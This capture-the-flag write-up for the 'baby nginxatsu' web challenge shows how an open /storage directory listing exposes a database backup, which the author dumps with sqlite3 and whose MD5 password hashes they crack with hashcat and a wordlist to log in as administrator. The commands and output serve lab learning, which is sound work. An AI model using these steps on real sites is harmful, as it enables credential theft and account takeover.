Description
Can you find a way to login as the administrator of the website and free nginxatsu?
Solution
Looking at the provided URL 167.172.56.232:31642
, we see the following:
Default page when accessing the provided URL
As we dont have any valid credentials, we can simply create a new user and log in.
Once logged in, we are prompted with a configuration page. Apparently we are able to create our own nginx configuration.
nginx configuration generator page
Without modifying anything, I hit the Generate Config
button to see what happens. A new config appears! Looking at the config, we see the following:
Snippet of the ngxinx configuration generator’s default output
The config reveals something very interesting: autoindex
for /storage
is set to on
. This means, that directory-listing is enabled, thus we can see all files in this directory in our browser. Also the comment is very suspicious. It is more or less already telling us : *Go there and you will find a secret *.
1
2
3
4
5
6
# We sure hope so that we don't spill any secrets
# within the open directory on /storage
location /storage {
autoindex on;
}
So, let’s have a look at the storage directory.
Listing of the /storage directory displayed in the browser.
Hmmmm a lot of files! But wait! There is file called v1_db_backup_1604123342.tar.gz
. That seems off. Let’s download and inspect it on our local machine.
After we use tar
to unpack it, we can use sqlite3
to take a look at the database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/…/challenges/web/baby_nginxatsu/database]
└─$ sqlite3 database.sqlite
sqlite> .tables
failed_jobs nginx_configs users
migrations password_resets
sqlite> PRAGMA table_info(users);
0|id|INTEGER|1||1
1|name|varchar|1||0
2|email|varchar|1||0
3|password|varchar|1||0
4|api_token|varchar|1||0
5|remember_token|varchar|0||0
6|created_at|datetime|0||0
7|updated_at|datetime|0||0
sqlite> select email,password from users;
nginxatsu-adm-01@makelarid.es|e7816e9a10590b1e33b87ec2fa65e6cd
nginxatsu-giv@makelarid.es|22d94e7c519d6074c57789674cc9959b
nginxatsu-me0wth@makelarid.es|1ae9603761473a3e375812989f9511db
There we go! We have 3 emails and 3 password hashes which look pretty much like MD5 hashes. I copied all of the hashes in a text file and used hashcat
to crack them.
1
2
3
4
5
6
┌──(kali㉿kali)-[~/…/challenges/web/baby_nginxatsu/database]
└─$ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt
e7816e9a10590b1e33b87ec2fa65e6cd:adminadmin1
Recovered........: 1/3 (33.33%) Digests
Great! We found a password. The cracked password hash belongs to the email nginxatsu-adm-01@makelarid.es
. So now let’s use those credentials to log in.
Flag displayed on the configuration page, once logged in with the obtained credentials.
And there’s the flag!